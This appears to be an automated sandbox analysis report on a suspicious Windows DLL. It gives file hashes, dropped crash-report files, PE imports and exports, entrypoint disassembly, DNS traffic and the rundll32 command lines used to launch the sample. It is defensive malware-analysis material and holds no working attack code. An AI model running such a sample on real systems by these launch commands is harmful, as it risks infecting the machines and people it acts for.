SSDEEP:192:Rrl7r3GLNiYi6t9Xp6YIu6DaZbgmfTk8GSLCpDd89bQCsfrUwm:RrlsNil6t9Z6YB6DalgmfTkrSRQBfu
MD5:EA67DF723579F9F5F17E692A8CA9BD24
SHA1:46461B5E60EB40D89F7985FC5D56A2913BBFA3D4
SHA-256:10F07CFB58F20FEB633C899E53FF866F7B9B74C943429F5292A41A9B90A375F8
SHA-512:5814A115B08F81F593888CD61ECDA2E280CF969B36BEE529F3CE82B8D5916D2B394468CDD0D7B500B9FCE95A4CA11BCD9AFB68BB9DEFDDEF22AFDA32F3234FB2
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.2.4.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E1C.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4630
Entropy (8bit):4.457541334543927
Encrypted:false
SSDEEP:48:cvIwSD8zsqJgtWI9asWSC8BT48fm8M4JCdsGtFB+q8/5jcs4SrSMd:uITf4hFSNR1JgZ2csDWMd
MD5:E6CCF4A3AA610785C50C173E1A7976C7
SHA1:2FB6559D3E8D2EA6B7AF0574980772C232F7C077
SHA-256:740A09BBBA4C0B2B302AAA3102D617B8D35CE09CADD1E068AF8EB0604AB7A089
SHA-512:FD299617B050E254D4ECBBA43686E43BA56D1A6D3215A7F084E86E57546B4A4BB46BFB685A416B2CF863E9EB764FF4D6944EFAC73CA627FBFB2E3201E31AF6B4
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1074468" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE636.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Mon Jul 12 18:37:26 2021, 0x1205a4 type
Category:dropped
Size (bytes):280962
Entropy (8bit):1.6190396470705883
Encrypted:false
SSDEEP:768:B03QgVkiA5gchbjEVUyDX6OaEJpSWp6cEj/qsWDyNVBMg2Vllg:BoQgVk/gcFEV5XgEJpY3qjmNVslg
MD5:9AC78DF002B515CB73811D2CA5C3D41C
SHA1:DD93200FFE9ABCDC1BF6D163CA61B947941C9319
SHA-256:E67D5006C7D713C404C95F8E58B68B4FE52989D913671F3E4EBF595315E9A41E
SHA-512:6AFC6E40C33C66FEA6A828C44CB79E7C2A377829C3F8608FCEC8A824749BB6127A41641A91A5617C77F2162F90E1571917B25F21FF39FF116A3AC26A43DAADA1
Malicious:false
Preview: MDMP....... .........`...................U...........B..............GenuineIntelW...........T..............`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE77E.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Mon Jul 12 18:37:27 2021, 0x1205a4 type
Category:dropped
Size (bytes):31730
Entropy (8bit):2.5908843139629227
Encrypted:false
SSDEEP:192:NLnXZTgxJ6P4LMI2+2dCF2V6qkIHPpsI5xWGnx:FJTmwIBl2g2V6q4I5lx
MD5:B62BFAF733B3B9DB4873EB60FEC6812D
SHA1:215947439972F9A2ADE25E26F1B35F9C5E201BE1
SHA-256:6D66F2709120D2E6DCB4B0B1AD4E7F04AA8E47FF099E89E682518470DED7F018
SHA-512:58804ED5C76A0A51962B999E0BA8DBE6B87A52DEEBB64466AE1BBED6BCCF1B81FE6079F48ED863664230432C47196FF339E73969B8188D3985B8336967BCF2E3
Malicious:false
Preview: MDMP....... .........`...................U...........B..............GenuineIntelW...........T.......l......`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0F5.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8282
Entropy (8bit):3.6946242951270065
Encrypted:false
SSDEEP:192:Rrl7r3GLNijb6qU/6YIK6+aJbgmfTk8GSLCpDu89bfLsfULVm:RrlsNi/6qU/6YN6+aVgmfTkrS8fQfX
MD5:78A9B2639FBEB484496E0DD30F14E7A1
SHA1:43BC95135E8C35ED12BB8D4CA4F58DB5ABEB879D
SHA-256:E941E743CDC9F5AD163B9A90C879B798E5A3BF1000FED157808962EF70BE1DAA
SHA-512:CD43799611CC01456BBAE8927318BC352085682861B3B57FA3D223B10A8FE7492EDC241EA257D87FA7A1991AB97485C0F79DA13EB9DB27353D343E28A38876A5
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.4.<./.P.i.d.>.........
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF152.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8350
Entropy (8bit):3.690539983955562
Encrypted:false
SSDEEP:192:Rrl7r3GLNiYM6uAEd6YIm6+aJbgmf8lSJLCpBE89bfCsfDVm:RrlsNib6uAu6Yx6+aVgmf8lSJQfBfs
MD5:8270ACC93A90BBC69A9E4C6E322D4123
SHA1:448CB0408C15E46CC084445FA3A9D536DCEC8653
SHA-256:7319A54E282E1C3850C36D98F55B4E923FAB4BCBBFD2A88EE8CBD28C84B4AB10
SHA-512:F6A404AF9D1300A325277CBC0644EB00F4E1977A104A991E7F89B6971F907E5D150A8E094E2FF28B2BABEB509F1411EACC46799B676F5ADEACD86E0C7653837D
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.2.4.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF53B.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4630
Entropy (8bit):4.45574569896631
Encrypted:false
SSDEEP:48:cvIwSD8zsqJgtWI9asWSC8BNs8fm8M4JCdsGtFtJ+q8/5jH4SrS6d:uITf4hFSNTRJgFJ2HDW6d
MD5:9CE1A35D608471E1CB4FC7B9D3E1677F
SHA1:197E73863977B19EC31B551B1258363E311CF6F0
SHA-256:78E8A937C8C36917C51CAEF293069B9D8677E176DD4E4799AB53B025755CAEFA
SHA-512:608737A72FBA6E73EB41181E84EE29202D4C6AB7BAB6B259B6557E7EF9181BAB08853EA7586C8038DDE5AB426AFDC0639E03928ED0975A62D48B742F5C4EB000
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1074468" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5D8.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4731
Entropy (8bit):4.450261196501411
Encrypted:false
SSDEEP:48:cvIwSD8zsqJgtWI9asWSC8Bo8fm8M4JCdsqFn+q8vjsDs4SrSMd:uITf4hFSNLJOKOsDWMd
MD5:4C6796B08FFA1674376D69F88821DA34
SHA1:C03827CB15E533002B3B3D291686985CD0382C0C
SHA-256:99B1663F2E16E493E0CF5BC04A097D6EF5D1A53108DB3C099A61980B6DEBDF6B
SHA-512:0D7C06F0FF244FA5A78AED9BC3BFA8630D1B0E9A03DA56D4BC1BD806693E12791D5BE8460DD4F696D1B74F46B6B3E06B2F324231F7C2E527412517BE21B5D350
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1074468" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.767213059044483
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:lj3H69Z3Io.dll
File size:512000
MD5:0bb29556ece1c51c751cb4e7c8752ddc
SHA1:324cc356a56c68e51f09348e91405001e68e4a08
SHA256:af1b052362469a67fcd871558b24efa2be44a4b29f88112e5c2d2295a1dc4252
SHA512:33d9a2b92f209ed7fea50bc388d34d7cce773217f73d58fda98ad94c13cd64621b92525602e87c016bab424f438ae96655af8d8250d642d9d7fc7a080f936c79
SSDEEP:12288:pvlT2EsAw96epX+uHfa7Z5svN/RM2ZcV8TFITzhz3VFVUJcXH4nw7P1N:ZsN96cfKFVUJQu
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H..5...f...f...f.z.f...f.z.f...f.z.f...f^..g...f^..g8..f^..g...f..}f...f...fv..f...g...f...g...f...g...fRich...f........PE..L..

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x10340e7
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x1000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5B2B4D21 [Thu Jun 21 07:00:49 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:df95180b6da9d16cb69b63ca8bb7f332

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F4810909B17h
call 00007F481090A295h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F48109099C8h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
mov eax, dword ptr [0107B164h]
and eax, 1Fh
push 00000020h
pop ecx
sub ecx, eax
mov eax, dword ptr [ebp+08h]
ror eax, cl
xor eax, dword ptr [0107B164h]
pop ebp
ret
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F4810909B2Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F4810909B1Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F4810909B1Eh
add edx, 28h
cmp edx, esi
jne 00007F4810909AFCh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F4810909B0Bh
push esi
call 00007F481090A616h
test eax, eax
je 00007F4810909B32h
mov eax, dword ptr fs:[00000018h]
mov esi, 01113000h
mov edx, dword ptr [eax+04h]
jmp 00007F4810909B16h
cmp edx, eax
je 00007F4810909B22h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F4810909B02h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
call 00007F481090A5E5h
test eax, eax
je 00007F4810909B19h
call 00007F481090A445h
jmp 00007F4810909B2Ah
call 00007F4810909B61h

Rich Headers

Programming Language:
  • [IMP] VS2008 SP1 build 30729

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x798900x80.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x799100x8c.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x1140000x3530.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x778f00x54.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x779480x40.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x510000x1c4.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x4f1c70x4f200False0.639085332741data6.65199808864IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x510000x2936e0x29400False0.621620501894data6.09428205246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x7b0000x98ad00x1000False0.2373046875data3.49060216778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc0x1140000x35300x3600False0.748191550926data6.69710092848IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLLImport
KERNEL32.dllGetEnvironmentVariableA, GetSystemDirectoryA, GetTempPathA, GetWindowsDirectoryA, GetCurrentDirectoryA, DeleteFileA, SetConsoleCP, GetStartupInfoA, WriteConsoleW, GetProcessHeap, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, CreateProcessA, GetTickCount, CloseHandle, HeapSize, VirtualProtect, FindNextFileA, FindFirstFileExA, FindClose, HeapReAlloc, WideCharToMultiByte, GetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, MultiByteToWideChar, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, CompareStringW, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, RtlUnwind, InterlockedFlushSList, FreeLibrary, LoadLibraryExW, CreateFileW, GetFileType, ExitProcess, GetModuleHandleExW, GetModuleFileNameA, HeapAlloc, HeapFree, GetACP, GetStdHandle, GetTimeZoneInformation, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, SetStdHandle, WriteFile, GetConsoleCP, GetConsoleMode, SetEndOfFile, ReadFile, ReadConsoleW, SetFilePointerEx, FlushFileBuffers
USER32.dllGetClipboardData, SendMessageA, DestroyWindow, CheckRadioButton, SendDlgItemMessageW, SetClipboardData, SetForegroundWindow
ole32.dllCoTaskMemFree, CoInitialize, CoTaskMemAlloc, CoUninitialize
ADVAPI32.dllRegOpenKeyExA, RegCreateKeyA, RegCloseKey, RegQueryValueExA
WTSAPI32.dllWTSCloseServer, WTSOpenServerA
NETAPI32.dllNetWkstaGetInfo, NetWkstaSetInfo, NetApiBufferFree

Exports

NameOrdinalAddress
Busysection10x1028480
Dealthis20x1028730
Sing30x1028560
Teethshould40x1027390

Network Behavior

Network Port Distribution

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 12, 2021 11:35:42.834290981 CEST6426753192.168.2.68.8.8.8
Jul 12, 2021 11:35:42.848416090 CEST53642678.8.8.8192.168.2.6
Jul 12, 2021 11:35:46.661123037 CEST4944853192.168.2.68.8.8.8
Jul 12, 2021 11:35:46.674065113 CEST53494488.8.8.8192.168.2.6
Jul 12, 2021 11:35:47.399993896 CEST6034253192.168.2.68.8.8.8
Jul 12, 2021 11:35:47.450851917 CEST53603428.8.8.8192.168.2.6
Jul 12, 2021 11:35:48.212610006 CEST6134653192.168.2.68.8.8.8
Jul 12, 2021 11:35:48.225739002 CEST53613468.8.8.8192.168.2.6
Jul 12, 2021 11:35:49.004206896 CEST5177453192.168.2.68.8.8.8
Jul 12, 2021 11:35:49.017424107 CEST53517748.8.8.8192.168.2.6
Jul 12, 2021 11:35:50.301012993 CEST5602353192.168.2.68.8.8.8
Jul 12, 2021 11:35:50.314498901 CEST53560238.8.8.8192.168.2.6
Jul 12, 2021 11:35:51.185600042 CEST5838453192.168.2.68.8.8.8
Jul 12, 2021 11:35:51.198560953 CEST53583848.8.8.8192.168.2.6
Jul 12, 2021 11:35:52.219711065 CEST6026153192.168.2.68.8.8.8
Jul 12, 2021 11:35:52.233320951 CEST53602618.8.8.8192.168.2.6
Jul 12, 2021 11:35:53.003760099 CEST5606153192.168.2.68.8.8.8
Jul 12, 2021 11:35:53.018810987 CEST53560618.8.8.8192.168.2.6
Jul 12, 2021 11:36:41.612941027 CEST5833653192.168.2.68.8.8.8
Jul 12, 2021 11:36:41.633929968 CEST53583368.8.8.8192.168.2.6
Jul 12, 2021 11:37:20.566775084 CEST5378153192.168.2.68.8.8.8
Jul 12, 2021 11:37:20.579951048 CEST53537818.8.8.8192.168.2.6
Jul 12, 2021 11:37:21.662216902 CEST5406453192.168.2.68.8.8.8
Jul 12, 2021 11:37:21.675820112 CEST53540648.8.8.8192.168.2.6
Jul 12, 2021 11:37:22.344091892 CEST5281153192.168.2.68.8.8.8
Jul 12, 2021 11:37:22.364754915 CEST53528118.8.8.8192.168.2.6
Jul 12, 2021 11:37:23.359174967 CEST5529953192.168.2.68.8.8.8
Jul 12, 2021 11:37:23.372114897 CEST53552998.8.8.8192.168.2.6
Jul 12, 2021 11:37:24.318350077 CEST6374553192.168.2.68.8.8.8
Jul 12, 2021 11:37:24.334407091 CEST53637458.8.8.8192.168.2.6
Jul 12, 2021 11:37:24.973493099 CEST5005553192.168.2.68.8.8.8
Jul 12, 2021 11:37:24.986274958 CEST53500558.8.8.8192.168.2.6
Jul 12, 2021 11:37:25.855635881 CEST6137453192.168.2.68.8.8.8
Jul 12, 2021 11:37:25.869664907 CEST53613748.8.8.8192.168.2.6
Jul 12, 2021 11:37:27.298402071 CEST5033953192.168.2.68.8.8.8
Jul 12, 2021 11:37:27.311743021 CEST53503398.8.8.8192.168.2.6
Jul 12, 2021 11:37:28.336294889 CEST6330753192.168.2.68.8.8.8
Jul 12, 2021 11:37:28.350296974 CEST53633078.8.8.8192.168.2.6
Jul 12, 2021 11:37:32.265516043 CEST4969453192.168.2.68.8.8.8
Jul 12, 2021 11:37:32.306720972 CEST53496948.8.8.8192.168.2.6
Jul 12, 2021 11:37:32.773094893 CEST5498253192.168.2.68.8.8.8
Jul 12, 2021 11:37:32.786079884 CEST53549828.8.8.8192.168.2.6
Jul 12, 2021 11:37:34.031423092 CEST5001053192.168.2.68.8.8.8
Jul 12, 2021 11:37:34.045018911 CEST53500108.8.8.8192.168.2.6
Jul 12, 2021 11:37:34.876960039 CEST6371853192.168.2.68.8.8.8
Jul 12, 2021 11:37:34.891311884 CEST53637188.8.8.8192.168.2.6
Jul 12, 2021 11:37:52.291438103 CEST6211653192.168.2.68.8.8.8
Jul 12, 2021 11:37:52.305675983 CEST53621168.8.8.8192.168.2.6

DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
Jul 12, 2021 11:37:32.306720972 CEST8.8.8.8192.168.2.60xf4ffNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
Jul 12, 2021 11:37:34.045018911 CEST8.8.8.8192.168.2.60xdc08No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 2392 Parent PID: 5888

General

Start time:11:35:51
Start date:12/07/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll'
Imagebase:0x8a0000
File size:116736 bytes
MD5 hash:542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: cmd.exe PID: 2200 Parent PID: 2392

General

Start time:11:35:51
Start date:12/07/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
Imagebase:0x2a0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 6072 Parent PID: 2392

General

Start time:11:35:52
Start date:12/07/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
Imagebase:0x1c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 6068 Parent PID: 2200

General

Start time:11:35:52
Start date:12/07/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
